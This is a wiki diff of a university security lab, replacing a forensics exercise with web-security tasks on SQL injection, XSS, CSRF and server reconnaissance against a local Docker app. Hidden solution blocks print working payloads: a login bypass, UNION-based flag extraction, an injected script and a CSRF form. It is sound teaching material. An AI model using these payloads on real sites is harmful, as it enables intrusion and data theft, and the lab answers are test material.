Differences

This shows you the differences between two versions of the page.

Link to this comparison view

isc:labs:09 [2017/05/14 15:33]
filip.munteanu [Exercises]
isc:labs:09 [2023/12/11 11:42] (current)
florin.stancu
Line 1: Line 1:
-====== Lab 09 - Forensics ======+/* ~~SHOWSOLUTION~~ */
  
-===== Overview ​=====+====== Lab 09 - Web Security ======
  
-Computer forensics is a branch of digital forensic science pertaining to evidence found in computers ​and digital storage media. The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifyingpreserving, recovering, analyzing and presenting facts and opinions about the digital information.+===== Objectives ===== 
 +  * Web vulnerabilities,​ both server-side ​and client-side 
 +  * Server-side SQL injection 
 +  * Cross-Site ScriptingCross-Site Request Forgery
  
-===== Exercises ​=====+===== Background ​=====
  
-You are a private investigator and you have 2h to solve 9 mysteries. Every mystery ends with a flag like **ISC{...}**. \\ +==== SQL Injection ​====
-Are you up to the task? \\ \\ +
-{{:​isc:​labs:​movies.zip|Here}} is your data.\\ \\ +
-All exercises can be solved on the local Linux machine. +
-==== 00. Capture 1 ====+
  
-==== 01Unknown File Type ====+SQL Injection is a server-side code injection vulnerability resulting from 
 +improper (unsanitized) input directly concatenated into SQL queries. 
 +Typical server queries are built as strings: 
 +<code javascript>​ 
 +sql "​SELECT * FROM table WHERE item '"​ + user_input_variable + "'​ <other expressions>";​ 
 +database.query(sql);​ 
 +</​code>​
  
-==== 02. Hidden Flag ====+Note that the user may choose to escape the SQL quotes and alter the SQL statement, e.g.: 
 +<code javascript>​ 
 +user_input_variable ​"'​ OR 1=1 -- "; // example input given by the user 
 +sql "​SELECT * FROM table WHERE item ''​ OR 1=1 -- ' <other expressions>";​ 
 +</​code>​
  
-==== 03Corrupted File ====+An SQL injection exploit ultimately depends on the target SQL expression (which 
 +is usually unknown to the attacker) and query result behavior (whether the 
 +query contents arem displayed on screen or the user is blind, errors reported 
 +etc.).
  
-==== 04Audio Visualization ====+**Make sure to check those cheatsheets out:** \\ 
 +[[https://​portswigger.net/​web-security/​sql-injection]] \\ 
 +[[https://​github.com/​swisskyrepo/​PayloadsAllTheThings/​tree/​master/​SQL%20Injection]] \\ 
 +and:\\ 
 +[[https://​github.com/​swisskyrepo/​PayloadsAllTheThings/​blob/​master/​SQL%20Injection/​MySQL%20Injection.md]]
  
-Can you **see** it? +==== Other server-side vulnerabilities ​====
-==== 05. Hidden File ====+
  
-==== 06. Censored ====+The SQL injection is a popular server-side code injection vulnerability,​ but 
 +there are many mistakes that a website developer / system administrator can 
 +make (//expect to find some of them in your homework :P //):
  
-==== 07Waiting for eternity ====+  * code injection (LDAP, eval, shell execution etc.); 
 +  * broken authentication or access control (authorization);​ 
 +  * sensitive data exposure (e.g., backups / keys forgotten inside web root); 
 +  * path traversal;​ 
 +  * server misconfiguration;​ 
 +  * //​[[https://​owasp.org/​www-community/​vulnerabilities/​|and many more]]//
  
-==== 08Capture 2 ====+There are even 
 +[[https://​owasp.org/​www-community/​Vulnerability_Scanning_Tools|free or 
 +commercial web vulnerability scanners]] for testing a server'​s sercurity!
  
  
 +==== Client-side vulnerabilities ====
  
-===== Resources ===== +Browsers are now among the most targeted pieces of software on the Internet. 
-  * Hex Editor +This is mainly because of the large threat vector resulting from the complexity of 
-  * Wireshark +the web ecosystem, requiring features such as fancy HTML+CSS rendering, 
-  * Binwalk +animation and even sandboxed, untrusted JavaScript code execution.
-  * Audacity +
-  * Image extractor +
-  * USB documentation+
  
 +Even when the browsers do a good job at protecting against attacks, sometimes
 +trusted websites themselved may contain bugs that directly affect the security
 +of their users.
  
-<​hidden>​+A major threat, **Cross Site Scripting (XSS)** is a JavaScript code injection 
 +vulnerability where an attacker that found a way to post public HTML scripts 
 +into an unprotected website (e.g., by using comments forms or forum responses). 
 +Those scripts, if served to other visitors, will execute with the credentials 
 +of their respective users, making it possible for the attacker to scam, 
 +exfiltrate personal data or even push malware into the victim'​s PC.
  
-  ====== STUFF FROM SUMMER 2016 ======+Another typical client-side vulnerability that the web developers need to 
 +protect their websites against is 
 +**[[https://​research.securitum.com/​what-is-the-csrf-cross-site-request-forgery-vulnerability/​|Cross-Site 
 +Request Forgery (CSRF)]]**. 
 +In this attack, the victim is tricked into opening an attacker-controlled web 
 +page which then issues custom requests (either using concealed elements that do 
 +external requests - ''​img'',​ ''​form'',​ or by using JavaScript / AJAX) to 
 +another (target) website. The browser will happily make the requests using the 
 +target domain'​s cookies and credentials. 
 +If the target website has URLs that execute certain actions (e.g., ''​POST 
 +https://​my-blog/​post.php''​) without verifying the source of the request, any 
 +malicious page can execute them. 
 +Note that the attacker cannot see the results of those requests (unless 
 +authorized by CORS headers by the target). 
 +In practice, any URL endpoint executing sensitive actions needs to be protected 
 +using either referer validation or CSRF tokens.
  
 +===== Setup =====
  
 +You will be using a [[https://​cloud.grid.pub.ro/​|OpenStack VM]] for
 +your tasks.
  
-  TODO!!!! +Remember that the instances have private IPs, ''​10.9.x.y'',​ inaccessible from 
-  ​SCHIMBAT IP MASINA VIRTUALA SI MODIFICAT IN DOCUMENT+anywhere but the campus network. Since we need to use a local browser to access 
 +a web server running inside the VM, we will employ a SSH tunnelling + proxy 
 +trick to accomplish this.
  
-  Sa caute ultimul fisier modificat din filesystem +You should already have a [[:​isc:​info:​virtualmachine|SSH keypair for authenticating with fep & OpenStack]]:​
-  locatie in QR +
-   +
-  Adaugat ceva de mobile?? +
-    ​+
  
-   +We will be using ''​ssh''​`s Local Port Forwarding feature, requesting it to pass all packets from ''​localhost:​8080''​ through the SSH tunnel to the destination VM on ''​8080''​:
-===== Resources ===== +
-  +
-  *[[http://​downloads.volatilityfoundation.org/​releases/​2.4/​CheatSheet_v2.4.pdf|Volatility Cheatsheet]]+
  
 +<code bash>
 +ssh -L "​8080:​localhost:​8080"​ -J <​first.lastname>​@fep.grid.pub.ro student@10.9.X.Y
 +</​code>​
  
-===== Overview ​=====+===== Tasks =====
  
-  *You are a forensic detective hired to investigate the recent attack on our database server. Fortunately,​ the security team detected the intrusion in time and the hacker had to run quickly, leaving his laptop in the server room. Using a cold boot attack, we managed to obtain a dump of his ram. Your job is to gather as much intel as you can+=== 1 [20p]SQL Injection ===
  
 +  * Start the web server by using the following sequence: <code bash>
 +# First, start the MySQL instance in background
 +docker run -d --rm --name mysql ropubisc/​lab08-mysql
 +# Wait until the MySQL server fully starts:
 +docker logs mysql -f 
 +# Ctrl+C and continue when it says: '​mysqld:​ ready for connections.'​
  
-<note+# Finally, start the sample web server 
-Volatility usage:+docker run -it --link mysql:mysql -p 8080:8080 ropubisc/​lab08-web-server 
 +</code
 +  * Connect to the application using [[http://​localhost:​8080/​]] (assuming you forwarded the port correctly) 
 +  * Now: You don't know any user / password for this website. Try to log in using SQL Injection! 
 +  * The most common approach when testing for SQL Injection is to input an apostrophe ("'"​) in any of the provided fields ([[https://​security.stackexchange.com/​questions/​67972/​why-do-testers-often-use-the-single-quote-to-test-for-sql-injection]]) 
 +  * Hint: Try the apostrophe in one of the login fields, check if it shows an error! 
 +  * Note: After examining the error the form prompts, we can assume how the query is being made: <code sql> 
 +'​SELECT <some columns> FROM users WHERE username = ' + username + ' AND password = ' + password + ' LIMIT 1;' 
 +</​code>​ 
 +  * Is pretty obvious that the strings provided are not escaped and we can abuse this misconfiguration. Check the links in the beginning! 
 +  * If you ever want to exit the MySQL server:<​code>​ 
 +docker kill mysql 
 +</​code>​
  
-volatility-2.5.standalone.exe ​-<dumpimageinfo; Look at the suggested profile+<​solution -hidden>​ 
 +Login with ''​%%'​ OR 1=1 -- -%%''​ 
 +</solution>
  
-volatility-2.5.standalone.exe -f <​dump>​ --profile=<​profile>​ kdbgscan; Look at the Offset (V)+=== [20p]Advanced SQL Injection ===
  
-volatility-2.5.standalone.exe -<dump> --profile=<profile> --kdbg=<offsetCOMMAND +  * Start the web server from the first task again. 
-</note+  * What if I told you there is a hidden **flag** inside the database? Find it! 
-  ​+  * Hint: where do you have query feedback inside the application?​ try to do an ''​UNION''​ hack! 
 +  * Note: Since we will be using the same query as the one used in the first exercise, we must first find the exact number of columns provided to the statementWe are aiming at building a query of this format: <code sql> 
 +SELECT col1, col2, ..., colN from users WHERE username =''​ UNION SELECT col1, col2, ... , colN-1, desired_column from desired_database_table --;</code> 
 +  * Note: for UNION to work, you must SELECT exactly the same number of columns as in the original query! 
 +  * After finding out the exact number of columns, we can use ''​GROUP_CONCAT''​ technique to extract the available database table names.\\ Check out the cheatsheets from the Background section! (P.S. database schema is ''​journalapp''​) 
 +  * Hint: <​code>​UNION SELECT col1, col2, ... , colN-1, GROUP_CONCAT(<​what are we looking for in the schema>) FROM information_schema.tables WHERE table_schema='<our schema name>' </​code>​ \\ It is not necessary to know the exact names of '​col1',​ '​col2',​ ... 'colN-1'. You can replace it with numbers or '​@'​. 
 +  * Got any table that catches your eye? We are going to use ''​GROUP_CONCAT''​ again, but this time we are trying to find the name of the columns of our desired table. 
 +  * Hint: <​code>​UNION SELECT col1, col2, ... , colN-1, GROUP_CONCAT(<​what are we looking for in the table>) FROM information_schema.columns WHERE table_name='<our table name>' ​</code
 +  ​* Got the column name? Good. Now it should be nothing more than a simple select query :) 
 +  * Hint: <​code>​UNION SELECT col1, col2, ... , colN-1, <desired column name> FROM <desired table name></​code>​
  
-<note tip>You should look for processescommandsfileshistoryconnections and network traffic.</note>+<solution -hidden> 
 +Find the number of main table columns: ''​%%asd'​ UNION (SELECT 1234) -- .%%''​\\ 
 +Find the tables: ''​%%'​ UNION SELECT 1, 2, 3, GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='​journalapp'​ -- .%%''​\\ 
 +Find the columns: ''​%%'​ UNION SELECT 1, 2, 3, GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='​flags'​ -- .%%''​\\ 
 +Find the flag: ''​%%'​ UNION SELECT 1, 2, 3flag FROM flags -- .%%''​\\ 
 +</solution>
  
 +=== 3 [20p]. Cross-Site Scripting ===
  
 +  * You can still save the day: cover the monster'​s mouth (you can use the image at ''​http://​localhost:​8080/​images/​muzzle.png''​)!
 +  * Since HTML is allowed, you can also inject a JavaScript alert, example:<​code>​
 +<​script>​alert("​XSS!"​);</​script>​
 +</​code>​
 +  * **Hint**: You can use absolute element positioning,​ e.g.: ''<​div style=%%"​%%position:​ absolute; top: -300px;​left:​100px;​%%"​%%>​ insert your img here </​div>''​. Try it with the browser'​s developer console / inspect element first before injecting it inside a message ;) \\ [[https://​www.w3schools.com/​css/​css_positioning.asp]]
 +  * Hint: Console can be accessed either by right-clicking and choosing Inspect or by hitting F12 on your keyboard and navigating to '​Console'​ tab. 
 +  * Note: Try appending code to the document'​s body.
  
-==== Solution: ====+<​solution -hidden>​ 
 +<​code>​ 
 +<div style="​positionabsolute; top: -510px; left: 250px"><​img src="/​images/​muzzle.png"></​div>​ 
 +<​script>​alert("​No more Shosho, phew!"​);</​script>​ 
 +</​code>​ 
 +</​solution>​
  
-volatility-2.5.standalone.exe ​-f memory.dmp imageinfo+=== 4 [20p]Cross-Site Request Forgery ===
  
-volatility-2.5.standalone.exe ​-f memory.dmp --profile=Win7SP1x86 kdbgscan+  * The objective is to fool your victim using an external website (simulated using a local .html page) to post an attacker-controller message into the website. 
 +  * On your local station, as the attacker: create a simple HTML page that posts a hidden message to [[http://​localhost:​8080/​journal/​post]];​ this will be equivalent to hosting a malicious website; 
 +  * Hint: Check the HTML of the website for a ''​%%<​form>​%%''​ example! 
 +  * Hint: Use an input with ''​%%type="​hidden"​%%''​ 
 +  * Switching sides (you'​re the victim, now): open that HTML page using your web browserClick a button and the hidden message will be posted ;) 
 +  * (Make sure you are logged in inside the web app before doing the attack!) 
 +  * For bonus, you can try to do a cross-site AJAX posting the message automatically (without requiring user interaction!).
  
-volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 pslist ​ps.txt+<​solution ​-hidden>​ 
 +<​code>​ 
 +<form action="​http://​localhost:​8080/​journal/​post"​ method="​post">​ 
 +<input type="​hidden"​ name="​message"​ value="​I am stupid!">​ 
 +<input type="​submit"​ value="​Click me!">​ 
 +</​form>​ 
 +</​code>​ 
 +</​solution>
  
-volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 cmdline+=== [20p]Server Reconnaissance ===
  
-volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 consoles+  * Can you steal the source code of the server-side code using HTTP only? 
 +  * Once you found it, try to find the database credentials! 
 +  * Hint: try to guess the path to a [[https://​docs.npmjs.com/​files/​package.json|common file]] that all NodeJS projects have! It may reference the main script'​s name! 
 +  * Also try it by using a tool: [[https://​cirt.net/​nikto2|nikto]],​ ''​apt install nikto''​
  
-volatility-2.5.standalone.exe -f memory.dmp --profile=Win7SP1x86 --kdbg=0x82b73c78 dumpfiles -D file dump.txt+<​solution ​-hidden>​ 
 +<​code>​ 
 +GET /package.json 
 +it references the main file: 
 +GET /server.js 
 +</​code>​ 
 +</​solution>
  
-file: file.3640.0x86a44318+=== Feedback ===
  
-find: "​search"​ +Please take a minute to fill in the [[https://forms.gle/5Lu1mFa63zptk2ox9|feedback ​form]] for this lab.
- +
-http://www.bing.com/search?​q=https%3A%2F%2Fdocs.google.com%2Fdocument%2Fd%2F1KAHXjGIT_8EX0gA5NGZSZ0A-PzcVbzIxm1NKtQClvME%2Fedit%3Fusp%3Dsharing&​qs=n&​form=QBLH&​pq=https%3A%2F%2Fdocs.google.com%2Fdocument%2Fd%2F1kahxjgit_8ex0ga5ngzsz0a-pzcvbzixm1nktqclvme%2Fedit%3Fusp%3Dsharing&​sc=0-96&​sp=-1&​sk=&​cvid=32A3046F740B479DA10E524ABD27DB70 +
- +
-https://​docs.google.com/​document/​d/​1KAHXjGIT_8EX0gA5NGZSZ0A-PzcVbzIxm1NKtQClvME/​edit +
- +
-user besthacker +
- +
-WW91ciBwYXNzd2QgaXM6IENGVFVJQkRMRlM= BASE64decode +
- +
-Your passwd is: CFTUIBDLFS +
- +
-ssh besthacker@.....  +
- +
-</​hidden>​+
  
  
isc/labs/09.1494765196.txt.gz · Last modified: 2017/05/14 15:33 by filip.munteanu
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0